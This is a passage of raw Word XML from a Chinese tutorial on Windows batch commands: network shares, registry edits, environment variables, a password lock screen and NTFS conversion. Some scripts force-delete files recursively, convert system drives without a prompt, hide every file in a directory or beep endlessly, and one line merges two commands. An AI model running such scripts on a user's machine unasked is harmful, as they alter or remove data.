      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        1) Win98</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> winipcfg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        2) Win2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>以上：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Ipconfig /all</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        3) NSLOOKUP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    18.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>上的共享资源，就可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        net view 192.168.10.8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    19.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        A.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看你机器的共享资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: net share</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        B.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>手工删除共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          net share </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>共享资源名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>$ /d</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注意</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>后有空格。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        C.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>增加一个共享：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          net share mymovie=e:\downloads\movie /users:3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          mymovie </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>共享成功。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>同时限制链接用户数为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>人。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    20.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打开某网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          start iexplore.exe http://www.baidu.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>二、实例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> reg </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件，运行它，再删除它</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>安装文件的路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo Windows Registry Editor Version 5.00 &gt; c:\setupreg.reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup] &gt;&gt; c:\setupreg.reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo "ServicePackSourcePath"="D:\\Win2003\\" &gt;&gt; c:\setupreg.reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        echo "SourcePath"="D:\\Win2003\\" &gt;&gt; c:\setupreg.reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>写入注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        regedit /S c:\setupreg.reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除注册表文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        del c:\setupreg.reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用了</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结束后没有关闭，解决方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令运行文件，如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       start LeapFTP.exe 192.168.0.100</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置系统环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>有这个环境变量，则不需再设置，直接结束</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      if not "%JAVA_HOME%" == "" exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置环境变量的地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      set inputJavaHome=%cd%\jdk1.6.0_07</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置环境变量，也可以设置当前用户的变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      set EnvironmentHome=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>正在设置环境变量，请稍候</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>......</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      reg add "%EnvironmentHome%" /v JAVA_HOME /t reg_sz /d "%inputJavaHome%" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      reg add "%EnvironmentHome%" /v ClassPath /t reg_sz /d ".;%%JAVA_HOME%%\lib" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      reg add "%EnvironmentHome%" /v Path /t reg_sz /d "%%JAVA_HOME%%\bin;%Path%" /f]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>刷新，令环境变量生效</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      taskkill /f /im explorer.exe &gt;nul</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      start "" "explorer.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>隐藏某目录的所有文件及文件夹</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      cd /d </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>要隐藏的目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>D:)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      for /f "usebackq delims=" %%A in (`dir /a /b`) do (attrib "%%A" -r +h -s)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在批处理中使用密码。密码为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，输入正确，跳转到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">next1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，若输入密码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>次，则锁屏。。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      @echo off</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      set num=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :11</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      set /p pass=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      if "%pass%"=="admin" goto next1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      set /a num=%num% + 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      if %num%==3 goto no1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      goto 11</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :no1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      %windir%\system32\rundll32.exe user32.dll,LockWorkStation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      goto 11</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :next1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>密码正确，执行下面的程式</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      pause</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>清空回收站</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>未成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      @echo off</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      del /f /s /q c:\recycler\*.*</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      ::</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>刷新屏幕</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      taskkill /f /im explorer.exe &gt;nul</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      start "" "explorer.exe"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    7.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>让系统断断续续地鸣叫</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      @echo off</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :begin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>发出鸣叫</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>实际就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>码值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的特殊字符（蜂鸣键</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>beep</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>让程序暂停一小阵子</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      ping -n 1 -l 1 127.1&gt;nul</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      goto :begin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    8.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> FAT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>卷转换成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“CONVERT.exe”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>解析如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        CONVERT volume /FS:NTFS [/V] [/CvtArea:filename] [/NoSecurity] [/X]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          volume      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定驱动器号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>后面跟一个冒号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、装载点或卷名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          /FS:NTFS    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定要被转换成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> NTFS </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的卷。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          /V          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Convert </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>应该用详述模式运行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          /CvtArea:filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将根目录中的一个接续文件指定为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">NTFS </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统文件的占位符。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          /NoSecurity </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定每个人都可以访问转换的文件和目录的安全设置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">          /X          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果必要，先强行卸载卷。该卷的所有打开的句柄则无效。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>程序如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO OFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO.                               </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>说</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>明</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO --------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是一种磁盘格式。该格式能存放大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>4G</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的单个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如高清电影文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，并可对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        @ ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件夹进行加密，但有个缺点是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>下无法访问。建议</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘及其后的盘使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>格式，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘如非必要可以不转换，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>FAT32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这两种格式的读写速度几乎是没有差别的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO --------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        @ ECHO.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        convert c: /fs:ntfs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        :: D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘也转成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        convert d: /fs:ntfs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>获取我的文档</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        SET SF="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        FOR /F "tokens=2,*" %%I IN ('REG QUERY %SF% /v Personal 2^&gt;NUL^|FIND /I "Personal"') DO SET "myDoc=%%~J"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制文件到我的文档</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        XCOPY /D /E /R /Y /C  "%cd%\test.txt" "%myDoc%\test\"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>==========================================</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>实例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        3.IF-ERRORLEVEL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      @ECHO OFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件拷贝失败</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      IF ERRORLEVEL 0 ECHO </w:t>
